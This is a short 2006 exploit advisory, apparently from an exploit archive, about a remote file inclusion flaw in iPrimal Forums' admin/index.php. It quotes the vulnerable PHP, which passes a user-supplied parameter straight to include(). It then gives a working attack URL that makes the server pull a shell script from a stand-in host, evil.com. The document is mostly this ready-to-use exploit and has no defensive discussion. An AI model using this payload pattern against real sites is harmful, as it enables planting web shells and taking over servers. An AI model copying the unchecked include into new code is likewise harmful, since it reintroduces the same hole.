[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : iPrimal Forums (admin/index.php) Remote File Include Vulnerability
# Published : 2006-11-08
# Author : Bl0od3r
# Previous Title : MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability
# Next Title : vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:http://ipigroup.org/downloads/forums.zip
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code: #line 126-129
.....
if($_GET['p'] == ''){
echo 'Please select an item from the menu above.';
}else{
include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!
# www.Syue.com [2006-11-08]